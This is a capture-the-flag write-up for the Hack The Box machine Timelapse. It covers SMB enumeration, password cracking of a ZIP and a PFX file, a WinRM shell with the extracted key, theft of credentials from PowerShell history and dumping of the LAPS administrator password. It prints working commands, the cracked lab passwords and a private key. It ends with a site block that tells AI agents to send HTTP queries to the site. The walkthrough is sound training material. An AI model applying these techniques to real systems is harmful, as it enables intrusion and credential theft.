# Timelapse ## Enumeration ### Nmap First, let's scan for open ports using `nmap`. We can quickly scan for open ports and store them in a variable: `ports=$(nmap -p- --min-rate=1000 -T4 -Pn 10.10.11.152 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)`. Then, we can scan those specific ports in depth by running `nmap`'s built-in scripts: `nmap -p$ports -sC -sV -Pn 10.10.11.152`. We need to specify `-Pn` to disable host discovery so nmap doesn't think the machine is down. ``` PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-25 00:55:16Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 | ssl-cert: Subject: commonName=dc01.timelapse.htb | Not valid before: 2021-10-25T14:05:29 |_Not valid after: 2022-10-25T14:25:29 | tls-alpn: |_ http/1.1 |_ssl-date: 2022-07-25T00:56:46+00:00; +8h00m02s from scanner time. |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49696/tcp open msrpc Microsoft Windows RPC 58355/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2022-07-25T00:56:08 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required |_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s ``` ### Port `139` and `445` (SMB) You can learn more about SMB on [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb). Let's see if there are any shares we can list without an account by running `smbclient --no-pass -L //10.10.11.152`: ``` Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Shares Disk SYSVOL Disk Logon server share ``` There is a `Shares` share so let's try listing files without specifying login details by running `smbclient --no-pass //10.10.11.152/Shares`: ``` smb: \> ls . D 0 Mon Oct 25 11:39:15 2021 .. D 0 Mon Oct 25 11:39:15 2021 Dev D 0 Mon Oct 25 15:40:06 2021 HelpDesk D 0 Mon Oct 25 11:48:42 2021 6367231 blocks of size 4096. 2316373 blocks available smb: \> cd Dev smb: \Dev\> ls . D 0 Mon Oct 25 15:40:06 2021 .. D 0 Mon Oct 25 15:40:06 2021 winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021 6367231 blocks of size 4096. 2316373 blocks available smb: \Dev\> cd ../HelpDesk\ smb: \HelpDesk\> ls . D 0 Mon Oct 25 11:48:42 2021 .. D 0 Mon Oct 25 11:48:42 2021 LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021 LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021 LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021 LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021 6367231 blocks of size 4096. 2316373 blocks available ``` We can download these files in many ways, but we mount the share to make it easy: `mkdir share && sudo mount -t cifs //10.10.11.152/Shares ./share`. Just hit enter when asked for a password. Copy the files and then run `sudo umount share` to dismount the SMB share. ## Foothold ### ZIP File Bruteforcing Let's try unzipping the `winrm_backup.zip` in the `Dev` directory with `unzip winrm_backup.zip`: ``` Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password: skipping: legacyy_dev_auth.pfx incorrect password ``` It is password protected. We can bruteforce crack the password using John the Ripper. Run `zip2john winrm_backup.zip > hash.txt` to create a hash file of the password protected zip file. Then, run `john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt` to crack the hash: ``` Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx) 1g 0:00:00:00 DONE (2022-07-24 13:34) 2.222g/s 7718Kp/s 7718Kc/s 7718KC/s surkerior..superkebab Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` The password is `supremelegacy`. We can now run `unzip winrm_backup.zip` and enter the password to extract `legacyy_dev_auth.pfx`. Let's see what file this is by running `file legacyy_dev_auth.pfx` ``` legacyy_dev_auth.pfx: data ``` ### PFX File Bruteforcing Searching for "pfx file wikipedia" reveals that this is a [PKCS 12](https://en.wikipedia.org/wiki/PKCS_12) file. According to Wikipedia, "In cryptography, PKCS #12 defines an archive file format for storing many cryptography objects as a single file. It is commonly used to bundle a private key with its X.509 certificate or to bundle all the members of a chain of trust." Searching for "extract pfx file" finds [Extracting Certificate and Private Key Files from a .pfx File](https://wiki.cac.washington.edu/display/infra/Extracting+Certificate+and+Private+Key+Files+from+a+.pfx+File). We can run `openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes` to export the private key, but it asks for an "import password." We can try to bruteforce this with `john` as well by running `pfx2john legacyy_dev_auth.pfx > hash2.txt` and then `john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt`: ``` Using default input encoding: UTF-8 Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x]) Cost 1 (iteration count) is 2000 for all loaded hashes Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status thuglegacy (legacyy_dev_auth.pfx) 1g 0:00:00:26 DONE (2022-07-24 13:45) 0.03835g/s 123964p/s 123964c/s 123964C/s thuglife06..thsco04 Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` This shows the password is `thuglegacy`. Now, let's rerun `openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes` to export the private key and use the now known password. Then, run `openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem` to export the certificate using the same password. ``` $ cat cert.pem Bag Attributes localKeyID: 01 00 00 00 subject=CN = Legacyy issuer=CN = Legacyy -----BEGIN CERTIFICATE----- MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1 MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0 0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z 7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72 MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0 3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/ fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA $ cat key.pem Bag Attributes Microsoft Local Key set: localKeyID: 01 00 00 00 friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b Microsoft CSP Name: Microsoft Software Key Storage Provider Key Attributes X509v3 Key Usage: 90 -----BEGIN PRIVATE KEY----- MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3 dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2 qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0 Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ 7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7 tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ 2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja 8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV 1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN 71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3 QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0 6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK /ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8 A5ZZvI+GsHhm0Oab7PEWlRY= -----END PRIVATE KEY----- ``` Remove the lines before `-----BEGIN PRIVATE KEY-----` in each of the files to get the key and certificate by themselves. ### Evil WinRM According to [HackTricks](https://book.hacktricks.xyz/pentesting/5985-5986-pentesting-winrm#using-evil-winrm) and the [Evil WinRM documentation](https://github.com/Hackplayers/evil-winrm#help), we can use `evil-winrm` like so: `evil-winrm -S -k -c -i ` and authenticate via SSL. Let's connect by running `evil-winrm -S -k key.pem -c cert.pem -i 10.10.11.152`. We get a shell on the machine! Now, we can get the `user.txt` flag with `cat ..\Desktop\user.txt`. ## Lateral Movement Let's upload [WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) to scan for ways to gain privileges. Since we are using `evil-winrm` we can simply run the `upload` command: `upload /home/kali/Downloads/winPEASx64.exe`. We can run it with `.\winPEASx64.exe`: ``` Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1 + .\winPEASx64.exe + ~~~~~~~~~~~~~~~~. At line:1 char:1 + .\winPEASx64.exe + ~~~~~~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException + FullyQualifiedErrorId : NativeCommandFailed ``` Windows is detecting it as a virus. We could try to [bypass the AV](https://book.hacktricks.xyz/windows-hardening/av-bypass) but that seems like a lot of work. We could also try the [bat version of winPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASbat). After digging around for a while following the [Windows Local Privilege Escalation](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) page on HackTricks, we found that there is a [PowerShell history file](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#powershell-history). You can view the contents with `type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`: ``` whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl - SessionOption $so -scriptblock {whoami} get-aduser -filter * -properties * exit ``` `invoke-command` is used to run "commands on local and remote computers" according to the [PowerShell documentation](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2). So, we are provided with a command to run commands as the `svc_deploy` user. We check which users are on the machine: ``` *Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\ *Evil-WinRM* PS C:\Users> ls Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/23/2021 11:27 AM Administrator d----- 10/25/2021 8:22 AM legacyy d-r--- 10/23/2021 11:27 AM Public d----- 10/25/2021 12:23 PM svc_deploy d----- 2/23/2022 5:45 PM TRX ``` Sure enough there is a `svc_deploy` user. Let's rerun these commands to make sure they work: ``` $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami} ``` The above commands output `timelapse\svc_deploy`. So, we can execute commands as the `svc_deploy` user. ## Privilege Escalation We can see what groups `svc_deploy` belongs to by running `net user svc_deploy` with `invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {net user svc_deploy}`: ``` User name svc_deploy Full Name svc_deploy Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/25/2021 12:12:37 PM Password expires Never Password changeable 10/26/2021 12:12:37 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/24/2022 7:40:40 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *LAPS_Readers *Domain Users ``` It is part of the `LAPS_Readers` group. According to [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#laps), "LAPS allows you to manage the local Administrator password (which is randomised, unique, and changed regularly) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES." So, we can view the local Administrator password because we are part of the `LAPS_Readers` group. Searching for "view laps password powershell" finds [this article](https://smarthomepursuits.com/export-laps-passwords-powershell/) from which I determined that running `Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime` will print the password. So, run `invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}`: ``` PSComputerName : localhost RunspaceId : caa1633d-9159-4aff-878c-7f9093c813d4 DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb DNSHostName : dc01.timelapse.htb Enabled : True ms-Mcs-AdmPwd : 02j(2Mj4(T2$Ic,cGFs{j/4% ms-Mcs-AdmPwdExpirationTime : 133035980576115802 Name : DC01 ObjectClass : computer ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f SamAccountName : DC01$ SID : S-1-5-21-671920749-559770252-3318990721-1000 UserPrincipalName : ``` The password for local Administrator `DC01` is `02j(2Mj4(T2$Ic,cGFs{j/4%`. So, let's use `evil-winrm` to connect as that user. From the attacker machine, run `evil-winrm -S -u 'Administrator' -p '02j(2Mj4(T2$Ic,cGFs{j/4%' -i 10.10.11.152`. The `root.txt` flag is not in the usual spot at `C:\Users\Administrator\Desktop\root.txt`. We can try to find it by navigating to `C:\Users` and then running `gci -recurse -filter "root.txt"` (command from [this StackOverflow answer](https://stackoverflow.com/a/3428113)): ``` Directory: C:\Users\TRX\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/24/2022 12:54 PM 34 root.txt ``` Running `cat C:\Users\TRX\Desktop\root.txt` prints the root flag. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://htb.haydenhousen.com/machines/timelapse.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.